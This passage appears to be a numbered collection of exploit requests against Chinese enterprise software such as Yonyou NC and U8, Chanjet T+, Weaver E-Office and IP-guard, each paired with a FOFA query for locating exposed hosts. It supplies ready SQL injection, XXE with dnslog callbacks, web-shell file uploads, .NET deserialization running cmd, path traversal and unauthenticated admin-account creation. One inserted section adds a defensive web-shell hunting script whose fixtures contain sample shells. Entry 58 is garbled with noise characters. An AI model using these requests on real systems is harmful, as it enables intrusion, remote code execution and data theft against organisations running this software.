User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA: app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA: app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA: app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA: app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA: title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA: app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA: app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA: app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA: app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA: app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA: app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud (government finance cloud) arbitrary file read
FOFA: body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA: title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA: body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA: body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
FOFA: app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA: app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA: app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(Note: the only payload reproduced for this entry is a path-traversal read of /etc/passwd; no upload request is given.)

54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA: app="畅捷通-TPlus"
Step 1: send the request below. It executes a command that writes the given string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: fetch the written file at the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

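The upload and command-execution entries above each leave a file on disk at a location the request itself names: a JSP under webapps\nc_web (entries 24 and 35), /uapim/static/pages/nc/head.jsp (entry 28), a .tmp.php under /tmpfile (entry 49) and a dot-prefixed .txt under /tplus (entry 54). The script below is an added example, not code from the original post, for the host-side check a defender runs after patching: it walks a web root and reports script files that contain exec or probe indicators, carry a double extension, have a long random basename, or are hidden files. The indicator set, rule names and the fixture tree it builds in a temporary directory are my own constructions shaped after those drop paths.

```python
"""Post-compromise hunt for dropped web shells under a web root. Added example,
not from the original post; the indicator set and the fixture tree are mine,
shaped after the drop paths the upload entries above name."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

SCRIPT_EXT = {".jsp", ".jspx", ".php", ".asp", ".aspx", ".ashx"}
# Content indicators for the server-side languages seen above (names are mine).
INDICATORS = {
    "jsp_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder"),
    "jsp_probe": re.compile(r"<%\s*out\.print(?:ln)?\s*\("),          # echo probe as in the POCs
    "php_exec": re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|popen)\s*\(", re.I),
    "aspx_exec": re.compile(r"System\.Diagnostics\.Process|Process\.Start"),
}
# Random-looking basenames such as the 27-character names in the upload entries above.
RANDOM_STEM = re.compile(r"^[A-Za-z0-9]{20,}$")


def hunt(webroot: str) -> Dict[str, List[str]]:
    """Map each suspicious file (relative POSIX path) to its sorted reasons."""
    root = Path(webroot)
    findings: Dict[str, List[str]] = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        reasons: List[str] = []
        if path.name.startswith("."):
            reasons.append("hidden_file")  # e.g. the dot-prefixed marker an RCE probe writes
        if path.suffix.lower() in SCRIPT_EXT:
            if len(path.suffixes) > 1:
                reasons.append("double_extension")  # e.g. updXXXX.tmp.php
            if RANDOM_STEM.match(path.stem):
                reasons.append("random_basename")
            text = path.read_text(encoding="utf-8", errors="replace")
            reasons.extend(name for name, rx in INDICATORS.items() if rx.search(text))
        if reasons:
            findings[path.relative_to(root).as_posix()] = sorted(reasons)
    return findings


def build_sample_webroot() -> str:
    """Write a constructed web root mirroring the drop locations quoted above."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    files = {
        "nc_web/index.jsp": '<%@ page contentType="text/html" %><html><body>ok</body></html>',
        "nc_web/2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp": '<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>',
        "uapim/static/pages/nc/head.jsp":
            '<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
        "tmpfile/updB3CB.tmp.php": "<?php eval($_POST['c']); ?>",
        "tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt": "2WcBDoxC7JXhegsmOp6vJJ2dZBl\n",
        "static/app.js": "console.log('ok');",
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for rel, why in sorted(hunt(build_sample_webroot()).items()):
        print(f"{rel}: {', '.join(why)}")
```

Point hunt() at the real deployment directory (for NC that is the webapps\nc_web tree, for T+ the tplus virtual directory) and compare the output with the last known-good file inventory; the content rules are deliberately narrow, so a hit on a legitimate file is rare but a shell that hides its call behind reflection or encoding will only show up through the name-based rules.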
55. Chanjet T+ GetDecAllUsers information disclosure
FOFA: app="畅捷通-TPlus"
Step 1: obtain a Cookie from
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

" Q6 a; d- c- z$ E# S58. 畅捷通T+ KeyInfoList.aspx sql注入
' s' ^- ?* ]' }! }FOFA:app="畅捷通-TPlus"
$ K7 o% n8 x# S( Z: N! W7 [' }$ {GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
) T0 e# L" Z9 V8 S1 n! MHost: your-ip; c5 ]( m& y9 H5 i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 Y0 |, K9 o' N) {1 {
Accept-Charset: utf-8
( d6 G9 @; A& s! P+ QAccept-Encoding: gzip, deflate
; S8 C- Z4 x) P4 uConnection: close& Y' p6 i1 `1 e" x8 D
; r$ E9 I( {) u2 X  b- {+ ?& A, D

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Baizhuo Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate LianAiYun all-in-one face recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the path it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
